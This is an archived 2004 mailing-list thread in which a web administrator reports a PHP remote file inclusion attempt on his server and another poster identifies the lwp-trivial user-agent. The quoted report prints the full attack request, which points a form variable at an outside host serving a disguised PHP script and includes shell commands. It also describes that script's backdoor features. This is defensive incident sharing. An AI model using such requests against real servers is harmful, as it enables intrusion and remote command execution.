Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Incidents
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Data Cha0s PHP script attempt

from [Pall Thayer] Network Security [Permanent Link]
Subject: Re: Data Cha0s PHP script attempt
Date: Mon, 04 Oct 2004 15:33:28 +0000 
I couldn't find much information about "lwp-trivial", but it seems to be
not good for anything but badness.  I guess I'll have to look into
banning bots like this from our web server all together.


lwp is the www module for perl. lwp-trivial is the default user-agent for perl scripts using lwp to access webcontent.

Pall

Kirby Angell wrote:

Source IP: 200.203.109.237
Attack:  PHP form variable include

Twice tonight our web server received URL requests like this:

GET
/uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w
HTTP/1.0
Host: uptime.alertra.com
User-Agent: lwp-trivial/1.35

The attack attempts to trick the uptime.php form into loading the given
URL through one of the form variables.  Our forms are highly paranoid,
so that didn't work.  Of interest though, if you haven't seen it (and I
hadn't) is the script they tried to download:

http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg

which isn't a JPG at all, but itself is a PHP page.  I guess they
thought that our "pin" variable was used in an "include" statement.  The
rogue PHP script does all sorts of interesting things such as, running
commands (as in the attack above), gathering intelligence, attempting
exploits, and setting up back doors.

The script is apparently not too recent.  It won't work on any default
PHP install version 4.2 and above because it assumes the variables
passed to it will be converted to global variables (see:
http://www.php.net/manual/en/security.globals.php).  Recent versions of
PHP no longer do this.

The attacking IP seems to be a radio station in Brazil.  I have sent an
e-mail to them informing them that they are probably compromised.

I couldn't find much information about "lwp-trivial", but it seems to be
not good for anything but badness.  I guess I'll have to look into
banning bots like this from our web server all together.

--
Thank you,

Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0



--
_______________________________
Pall Thayer
artist/teacher
http://www.this.is/pallit
http://pallit.lhi.is/panse
_______________________________

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  DllTrojan ?, Michel Arboi
Next by Date:  Recent rise in Phishing attacks, Hubbard, Dan
Previous by Thread:  Data Cha0s PHP script attempt, Kirby Angell
Next by Thread:  DllTrojan ?, Michel Arboi
Indexes:  [Date] [Thread] [Top] [All Lists]